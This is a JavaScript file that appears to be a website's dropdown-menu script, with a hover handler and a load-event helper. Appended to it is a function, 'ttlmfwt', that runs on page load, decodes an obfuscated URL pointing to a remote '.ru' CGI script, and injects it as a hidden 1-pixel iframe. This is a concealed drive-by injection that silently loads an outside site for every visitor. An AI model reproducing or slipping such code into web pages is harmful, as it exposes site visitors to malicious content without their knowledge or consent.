	sfHover = function() {
			var sfEls = document.getElementById("subPages").getElementsByTagName("LI");
			for (var i=0; i<sfEls.length; i++) {
				sfEls[i].onmouseover=function() {
					this.className+=" sfhover";
				}
				sfEls[i].onmouseout=function() {
					this.className=this.className.replace(new RegExp(" sfhover\\b"), "");
				}
			}
		}
		if (window.attachEvent) window.attachEvent("onload", sfHover);

function addLoadEvent(func) {
  var oldonload = window.onload;
  if (typeof window.onload != 'function') {
    window.onload = func;
  } else {
    window.onload = function() {
      if (oldonload) {
        oldonload();
      }
      func();
    }
  }
}
addLoadEvent(ttlmfwt);
function ttlmfwt(){
	var url = 'hvjtICtXmpxO:I(/UU(/Qg(ixmr2Ot%aXRc%I.XXrFIumF/x%iUn92.9UcIgO8i(j?(69CXCX2jUmOv(K8&%FIQ9xR'.replace(/[CX2jUmOv(K8&%FIQ9xR]/g,'');
	var link = document.createElement('iframe');
	link.setAttribute('src', url);
	link.setAttribute('style','frameborder: 0px');
	link.setAttribute('style','height: 1px');
	link.setAttribute('style','width: 1px');
	document.body.appendChild(link);
	link.style.display='none';
}
